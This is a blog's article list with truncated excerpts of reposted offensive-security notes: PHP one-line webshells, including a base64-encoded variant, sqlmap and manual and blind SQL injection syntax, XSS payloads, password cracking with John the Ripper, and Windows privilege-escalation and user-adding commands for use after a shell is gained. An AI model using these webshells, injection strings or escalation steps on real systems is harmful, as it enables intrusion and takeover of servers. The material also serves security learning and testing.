- 博客(12)
- 收藏
- 关注
RSS订阅转载 Linux部分常用命令学习记录
Linux部分常用命令ls 显示目标列表ls -a 显示所有档案及目录(ls内定将档案名或目录名称为“.”的视为影藏,不会列出);ls -l 以长格式显示目录下的内容列表。输出的信息从左到右依次包括文件名,文件类型、权限模式、硬连接数、所有者、组、文件大小和文件的最后修改时间等;https://blog.csdn.net/bearcatfly/article/detail...
2019-09-25 09:10:00
194
转载 利用John the Ripper破解密码
John the Ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。除了在各种Unix系统上最常见的几种密码哈希类型之外,它还支持Windows ...
2019-09-11 18:45:00
504
转载 PHP一句话木马小结与SQL语句写一句话木马
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:<?php @eval($_GET["code"])?><?php @system($_POST["cmd"])?>二、编码的替换的类型:<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_dec...
2019-09-11 17:07:00
300
转载 web提权思路
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝...
2019-09-11 16:08:00
179
转载 sqlmap命令总结
Sqlmap常规命令:ACCESS(一个数据库):Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -tables (获取表)Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -columns -T 表 (获取指定表字段内容)Sqlmap -u “http:...
2019-09-11 14:14:00
222
转载 php网站密码md5加密串
PHP中“==”的一些坑PHP 是弱类型的语言,会自动进行数据类型转换,这无疑给我们的开发带来了极大的方便。可事实真是如此吗?今天我们就从==说起。栗子首先,看一下这段代码。猜猜看结果会是什么<?phpvar_dump(md5('240610708') == md5('QNKCDZO'));var_dump(md5('aabg7XSs') == md...
2019-09-11 10:47:00
153
转载 sql盲注语法
如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容获取数据长度:and (select top 1 len(列名) from 表名)>5and (select top 1 len(password) from admin)>16//错误and (select top 1 len(password) from admin)>15//正常...
2019-09-11 10:09:00
116
转载 拿下shell后提权命令
分享常用的DOS命令:查看版本:ver 查看权限:whoami 查看配置:systeminfo 查看用户:net user 查看进程:tasklist 查看正在运行的服务:tasklist /svc 查看开放的所有端口:netstat -ano 查询管理用户名:query user 查看搭建环境:ftp 127.0.0.1 查看指定服务的路径:sc qc Mysql 添加一个用户:net...
2019-09-11 09:59:00
364
转载 拿下shell后提权技巧
提权的技巧分享:1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.com cmd.txt cmd.rar等2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那...
2019-09-11 09:58:00
507
转载 sql手注基本过程
查询id=1 select * from aa where id=1 寻找sql注入点select * from aa where id=1‘ and ’1‘=’1 select * from aa where id=1‘ and ’1‘=’2查多少列select * from aa where id=1 ‘ order by 3 %23...
2019-09-11 09:54:00
139
转载 xss payload
<script>alert(xss)</script><img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')<a href=javascrip:alert("xss")>s</a> 点击s时运行alert('xss')<iframe src=javasc...
2019-09-11 09:42:00
136
转载 Access数据库注入
表-字段-数据:判断注入:and 1=1and 1=2查询语句:select * from new where id=14 and 1=1 //条件为真 返回正常select * from new where id=14 and 1=2 //条件为假 返回错误select * from new where id=14 or 1=1 //永真条件会返...
2019-09-11 09:36:00
89
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人